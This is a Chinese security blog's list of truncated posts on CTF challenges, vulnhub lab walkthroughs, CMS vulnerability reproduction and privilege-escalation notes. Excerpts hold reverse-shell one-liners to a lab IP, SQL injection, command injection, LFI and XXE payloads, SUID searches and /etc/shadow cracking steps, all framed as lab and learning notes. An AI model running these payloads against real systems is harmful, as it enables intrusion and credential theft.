- 博客(33)
- 收藏
- 关注
转载 iseacms1.0漏洞复现
iseacms1.0漏洞复现 作者: admin 时间: 2021-06-29 分类: 漏洞复现 Index.php源码<?phperror_reporting(0);$file=addslashes($_GET['r']);$action=$file==''?'index':$file;include('files/'.$ac...
2021-06-29 16:29:25
417
转载 espcms5.7.13 sql注入漏洞复现
espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/control/citylist.php文件可以看到$sql = "select * from $db_table where parentid=$pa...
2021-06-29 16:28:19
691
转载 尤里的复仇Ⅰ 小芳!
尤里的复仇Ⅰ 小芳! 作者: admin 时间: 2021-06-15 分类: 封神台 第一章:为了女神小芳!找到get参数id,使用"1'","1 or 1=1","1 or 1=2"测试,发现存在sql注入。最终payload为"id=1 and 1=2 union select 1,password from admin"。第二章:遇到...
2021-06-15 17:52:04
5228
转载 BLUEMOON: 2021
BLUEMOON: 2021 作者: admin 时间: 2021-06-10 分类: vulnhub靶场 fping -g 192.168.137.1/24 # step1 扫主机,找到靶场131nmap -A -p 1-65535 -v 192.168.137.131 # step2 扫端口,扫到21,22,80dirb http:/...
2021-06-11 09:26:45
597
转载 日志管理分析1
日志管理分析1 作者: admin 时间: 2021-06-09 分类: Linux secure中是sshd的日志,grep过滤出需要的信息(-v是反选),awk取出ipi=$10代表以空格分隔第10个字符串,count[ip1]++就是个数组,END是文档结尾后,最后遍历数组并输出sort是排序,-n按数字排序,-r代表降序head -1...
2021-06-11 09:25:59
71
转载 CLOVER: 1
CLOVER: 1 作者: admin 时间: 2021-06-08 分类: vulnhub靶场 1.主机发现,fping -g 192.168.137.0/24 | grep alive > /tmp/fpinged2.端口扫描,nmap -A -p 1-65535 -v 192.168.137.2223.ftp开启了匿名登录,get...
2021-06-10 08:55:25
306
转载 hacksudo: L.P.E.
hacksudo: L.P.E. 作者: admin 时间: 2021-06-03 分类: vulnhub靶场 step1.存活主机探测,使用"fping -g 192.168.3.0/24"扫描,结果如下,1是网关,129是kali,目标主机是133step2.端口扫描,使用"nmap -A -p 1-65535 -v 192.168.3....
2021-06-10 08:54:38
415
转载 debian忘记root密码怎么找回
debian忘记root密码怎么找回 作者: admin 时间: 2021-06-03 分类: Linux 写这篇文章是因为vulnhub的靶场上vmware上不能自动获取ip,要改一下ip配置文件grub界面按e,在大约倒数第3行的位置"ro"改为"rw init=/bin/sh",如图: 按"ctrl+x"进入单用户界面"mount -a...
2021-06-10 08:54:06
1868
转载 AKCMS后台存在文件上传漏洞
AKCMS后台存在文件上传漏洞 作者: admin 时间: 2021-06-03 分类: CNVD漏洞复现 在cnvd上找了文件上传漏洞,到cms的官网上把源码下载下来在本地复现安装界面如图:后台是这样的系统-模板-增加一个新模板,名字随便,内容如下接着在内容-单页下增加一个,使用刚才新建的模板验证 标签: n...
2021-06-10 08:53:09
348
转载 云演CTF: 012.exec
云演CTF: 012.exec 作者: admin 时间: 2021-05-31 分类: 信息收集 首页内容"the post Parameter is ip"POST传入参数ip=127.0.0.1可以用'&','|',';'等符号命令截断,传入ip=127.0.0.1;idflag在系统根目录 标签...
2021-06-10 08:52:20
394
1
转载 云演CTF: 011.这里有几首歌
云演CTF: 011.这里有几首歌 作者: admin 时间: 2021-05-31 分类: 云演CTF 首页有两个下载链接,其中"download.php?url=Y2hvdWJhZ3VhaS5tcDM="的base64解码后内容是"choubaguai.mp3",将"index.php"、"download.php"编码传入url,"in...
2021-06-10 08:51:40
455
转载 云演CTF: 010.php4fun
云演CTF: 010.php4fun 作者: admin 时间: 2021-05-31 分类: 云演CTF 题目给出源码备份"index.bak":<?phpfunction filter($v){ echo $v; $w = array('<','>','\.\.','^/+.*','file:///','php...
2021-06-10 08:51:01
994
转载 云演CTF: 009.php_for_fun
云演CTF: 009.php_for_fun 作者: admin 时间: 2021-05-31 分类: 云演CTF 在首页的返回头中获得hint文件名,内容是"Please input a parameter as number!!"尝试传入参数"number",返回"Please input a parameter as number!!"...
2021-06-10 08:50:22
636
转载 云演CTF: 008.后台管理系统
云演CTF: 008.后台管理系统 作者: admin 时间: 2021-05-31 分类: 云演CTF 右下角点击注册了个test用户,提示管理员才能拿到flag,再注册admin用户,返回用户已存在,尝试注册"admin ",注册成功拿到flag,想想不应该这么简单,百度"基于约束的sql注入",sql中字段有固定的长度,超出的部分就丢弃...
2021-06-10 08:49:16
1232
转载 云演CTF: 007.blog
云演CTF: 007.blog 作者: admin 时间: 2021-05-28 分类: 信息收集 打开就是登录界面,直接'123456',出现弹窗,还以为是js验证(想多了),CTRL+u打开源码$(function(){ var $login = $("#login"); $login.on( "click...
2021-06-09 22:57:45
1005
转载 云演CTF: 006.Lfi
云演CTF: 006.Lfi 作者: admin 时间: 2021-05-28 分类: 云演CTF 看名字就知道是local file include(本地文件包含),之前的笔记里有写过(打ctf时记的笔记(php))payload: ?file=php://filter/read=convert.base64-encode/resource...
2021-06-09 22:56:49
610
转载 云演CTF: 005.Blog
云演CTF: 005.Blog 作者: admin 时间: 2021-05-28 分类: 云演CTF 网站是个没有内容的博客,返回头表明了后端语言"Werkzeug/1.0.1 Python/2.7.6",尝试几个"www.zip,robots.txt"之类的路径没什么发现,然后各个标签点了点,发现了/div/目录,是这个样子的google一...
2021-06-09 22:53:08
872
1
转载 云演CTF: 004.intval
云演CTF: 004.intval 作者: admin 时间: 2021-05-27 分类: 云演CTF 进去直接给了代码<?phpif(!isset($_GET['source'])){ highlight_file('index.php'); die();}include('flag.php');$key1 ...
2021-06-09 22:51:02
1089
转载 云演CTF: 003.ereg
云演CTF: 003.ereg 作者: admin 时间: 2021-05-27 分类: 云演CTF 主页空白,没有返回有效信息。顺手打开robots.txt,发现源码,这个文本是给搜索引擎看的,里面的收录的目录和文件不会出现在搜索结果中(然并卵)if (isset ($_GET['password'])) {if (ereg ("1+$"...
2021-06-09 22:50:13
586
转载 云演CTF: 001单身一百年也没用和002单身20年的手速
云演CTF: 001单身一百年也没用和002单身20年的手速 作者: admin 时间: 2021-05-27 分类: 云演CTF 做前两题的时候没想到发出来,现在补上第一题在search_key.php的返回头里,通过chrome开发者工具能看到,然后base64解码提交第二题在search_key.php的返回体里,地址栏中输入这种格式的...
2021-06-09 22:49:18
691
1
转载 发现ctf平台
发现ctf平台 作者: admin 时间: 2021-05-27 分类: 灌水 想挖src漏洞,一直无处下手,然后就从安全客的活动中看到这个ctf平台,想想差不多一年没打了,再熟悉一下https://www.yunyansec.com/ 标签: none ...
2021-06-09 22:48:12
184
转载 暂时就这些
暂时就这些 作者: admin 时间: 2021-05-27 分类: 灌水 以前的笔记传的差不多了,还剩一些零零散散的东西整理起来太麻烦,就不管了 标签: none ...
2021-06-09 22:46:52
60
转载 常用的yum/apt源
常用的yum/apt源 作者: admin 时间: 2021-05-27 分类: Linux Centos-7.repo.txtkaliApt-get.list.txtcdrom.repo.txt 标签: linux
2021-06-09 22:45:50
71
转载 几个反弹shell
几个反弹shell 作者: admin 时间: 2021-05-27 分类: 信息收集 nc -e /bin/bash 192.168.137.17 4444(www-data)bash -i >& /dev/tcp/192.168.137.17/4444 0>&1(www-data)echo "bash -i &...
2021-06-09 22:44:29
145
转载 提权的几种方法
提权的几种方法 作者: admin 时间: 2021-05-27 分类: 权限提升 1.用searchexploit搜索系统版本漏洞,也可以用谷歌或者"https://www.exploit-db.com"2.如果/etc/shadow文件可读,可以爆破密码unshadow passwd shadow > crackedjohn cra...
2021-06-08 14:54:17
366
转载 SQL注入
SQL注入 作者: admin 时间: 2021-05-27 分类: 漏洞利用 select user from users limit 0,1 # 取查询结果的0-1条记录select group_concat(user) from users # 将查询结果合并输出select distinct(user) from user...
2021-06-08 14:53:22
82
转载 xxe利用
xxe利用 作者: admin 时间: 2021-05-27 分类: 漏洞利用 windows模板<?xml version="1.0"?><!DOCTYPE a [<!ENTITY test SYSTEM "file:///c:/windows/system.ini">]><something>...
2021-06-08 14:52:38
124
转载 收集linux用户密码版本...
收集linux用户密码版本... 作者: admin 时间: 2021-05-27 分类: 信息收集 meterpreter > sysinfo/etc/passwd/etc/shadow/etc/issue/etc/*-releaseuname -a 标签: linux ...
2021-06-08 14:51:53
98
转载 提权技巧(suid)
提权技巧(suid) 作者: admin 时间: 2021-05-27 分类: 权限提升 用以下命令查找find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -print2>/dev/null下面的是利用方式,这里不全,每个含有suid权限的文件都可以...
2021-06-08 14:51:09
249
转载 内网存活主机探测
内网存活主机探测 作者: admin 时间: 2021-05-27 分类: 信息收集 fping -ag 192.168.137.1/24 # 网段内存活主机探测netdiscover -i eth0 -r 192.168.137.1/24 # 网段内存活主机探测arping 192.168.137.1 # mac地址探测nmap -sP 1...
2021-06-08 14:50:23
426
转载 js小技巧(编码解码工具)
js小技巧(编码解码工具) 作者: admin 时间: 2021-05-27 分类: CTF 浏览器中按F12,在console标签栏中输入btoa(string) // base64编码,参数stringatob(base64String) // base64解码,参数base64Stringescape(string) ...
2021-06-08 14:48:52
448
转载 打ctf时记的笔记(php)
打ctf时记的笔记(php) 作者: admin 时间: 2021-05-27 分类: CTF ?page=php://filter/read=convert.base64-encode/resource=index.php // 文件包含查看源码?page=php://input // post发送包含page的文件内容?pag...
2021-06-08 14:47:59
297
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人